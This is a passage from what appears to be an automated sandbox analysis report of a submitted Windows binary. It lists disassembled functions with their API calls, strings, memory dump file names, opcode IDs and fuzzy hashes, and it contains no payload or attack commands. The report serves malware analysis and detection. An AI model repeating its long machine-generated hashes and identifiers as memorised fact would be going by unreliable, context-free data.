                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                                                  • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                  • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                                                                  • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                  • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                                                                  Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyWindow
                                                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                                                  • API String ID: 3375834691-2298589950
                                                                                                                                                                  • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                  • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                                                  • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                  • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                                                  Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 1682464887-234962358
                                                                                                                                                                  • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                  • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                                                                  • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                  • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                                                  Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 1682464887-234962358
                                                                                                                                                                  • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                  • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                  • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                                                  Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 1682464887-234962358
                                                                                                                                                                  • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                  • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                                  • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                  • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                                  Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 2507767853-234962358
                                                                                                                                                                  • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                  • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                  • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                                  Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 2507767853-234962358
                                                                                                                                                                  • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                  • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                                  • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                  • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                                  Function 00461554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                  • GetFocus.USER32 ref: 0046157B
                                                                                                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                                  • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows
                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                  • API String ID: 3342072951-1110647743
                                                                                                                                                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                                                  Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                                                  • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                  • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                                  • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                                  Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess
                                                                                                                                                                  • String ID: crts
                                                                                                                                                                  • API String ID: 1361684037-3724388283
                                                                                                                                                                  • Opcode ID: 434ffcbdc5e7f9b33e35ea07cff199a3d03e95f14558a5aa98a073663993cfb7
                                                                                                                                                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                                  • Opcode Fuzzy Hash: 434ffcbdc5e7f9b33e35ea07cff199a3d03e95f14558a5aa98a073663993cfb7
                                                                                                                                                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                  Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                  • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$LabelVolume
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 2006950084-234962358
                                                                                                                                                                  • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                  • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                                  • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                  • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                                  Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 3227129158-4108050209
                                                                                                                                                                  • Opcode ID: 614e70841ccedc7ef2346ec50982b3c3926ec3810c7867d7d64105b95043e321
                                                                                                                                                                  • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 614e70841ccedc7ef2346ec50982b3c3926ec3810c7867d7d64105b95043e321
                                                                                                                                                                  • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                                                  Function 0041793C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                                                    • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
